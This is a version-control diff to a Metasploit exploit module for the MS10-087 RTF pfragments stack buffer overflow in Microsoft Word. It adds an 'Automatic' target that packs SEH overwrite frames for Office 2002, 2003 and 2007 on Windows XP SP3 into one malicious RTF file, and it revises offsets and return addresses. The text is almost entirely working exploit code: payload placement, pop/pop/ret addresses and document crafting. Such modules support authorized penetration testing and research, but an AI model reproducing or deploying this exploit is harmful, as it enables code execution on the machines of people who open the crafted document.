add an automatic target and now includes Office XP SP3

git-svn-id: file:///home/svn/framework3/trunk@11505 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb

@@ -62,11 +62,23 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
+					# This automatic target will combine all targets into one file :)
+					[ 'Automatic', { } ],
+
+					# Office v10.6854.6845, winword.exe v10.0.6854.0
+					[ 'Microsoft Office 2002 SP3 English on Windows XP SP3 English',
+						{
+							'Offsets' => [ 23532, 45944 ],
+							#'Ret' => 0x30002491 # p/p/r in winword.exe v10.0.6854.0
+							'Ret' => 0x30002309 # p/p/r in winword.exe v10.0.6866.0
+						}
+					],
+
 					# Office v11.8307.8324, winword.exe v11.0.8307.0
 					# Office v11.8328.8221, winword.exe v11.0.8328.0
 					[ 'Microsoft Office 2003 SP3 English on Windows XP SP3 English',
 						{
-							'Offsets' => [ 24536, 51112 ],
+							'Offsets' => [ 24580, 51156 ],
 							'Ret' => 0x30001bdd # p/p/r in winword.exe
 						}
 					],
@@ -76,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					# Office v12.0.6425.1000, winword.exe v12.0.6425.1000
 					[ 'Microsoft Office 2007 SP2 English on Windows XP SP3 English',
 						{
-							'Offsets' => [ 5912 ],
+							'Offsets' => [ 5956 ],
 							'Ret' => 0x30001ceb # p/p/r in winword.exe
 						}
 					],
@@ -90,7 +102,8 @@ class Metasploit3 < Msf::Exploit::Remote
 						}
 					]
 				],
-			'DisclosureDate' => 'Nov 09 2010'))
+			'DisclosureDate' => 'Nov 09 2010',
+			'DefaultTarget' => 0))
 
 		register_options(
 			[
@@ -98,16 +111,21 @@ class Metasploit3 < Msf::Exploit::Remote
 			], self.class)
 	end
 
+	def add_target(rest, targ)
+		targ['Offsets'].each { |off|
+			seh = generate_seh_record(targ.ret)
+			rest[off, seh.length] = seh
+			distance = off + seh.length
+			jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
+			rest[off + seh.length, jmp_back.length] = jmp_back
+		}
+	end
+
 	def exploit
 
-		offsets = target['Offsets']
-
-		# Prepare a sample SEH frame
-		seh = generate_seh_record(target.ret)
-
-		# Prepare a sample backward jump
-		distance = offsets.max
-		jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
+		# Prepare a sample SEH frame and backward jmp for length calculations
+		seh = generate_seh_record(0xdeadbeef)
+		jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-0xffff").encode_string
 
 		# RTF property Array parameters
 		el_size = sz_rand()
@@ -118,28 +136,33 @@ class Metasploit3 < Msf::Exploit::Remote
 		# assert(amount1 <= amount2)
 		data << [0x1111].pack('v') * 2
 		data << [0xc8ac].pack('v')
-		data << [0x1111].pack('v') * 22
 
 		# Filler
 		if target.name =~ /Debug/i
-			rest = Rex::Text.pattern_create(offsets.max + seh.length + jmp_back.length)
+			rest = Rex::Text.pattern_create(0x10000 + seh.length + jmp_back.length)
 		else
-			rest = rand_text(offsets.max + seh.length + jmp_back.length)
+			len = 51200 + rand(1000)
+			rest = rand_text(len + seh.length + jmp_back.length)
 			rest[0, payload.encoded.length] = payload.encoded
 		end
 
-		# Fill in the seh frames
-		offsets.each { |off|
-			rest[off, seh.length] = seh
-			distance = off + seh.length
-			jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
-			rest[off + seh.length, jmp_back.length] = jmp_back
-		}
+		# Stick fake SEH frames here and there ;)
+		if target.name == "Automatic"
+			targets.each { |t|
+				next if t.name !~ /Windows/i 
 
+				add_target(rest, t)
+			}
+		else
+			add_target(rest, target)
+		end
+
+		# Craft the array for the property value
 		sploit = "%d;%d;" % [el_size, el_count]
 		sploit << data.unpack('H*').first
 		sploit << rest.unpack('H*').first
 
+		# Assemble it all into a nice RTF
 		content  = "{\\rtf1"
 		content << "{\\shp"             # shape
 		content << "{\\sp"              # shape property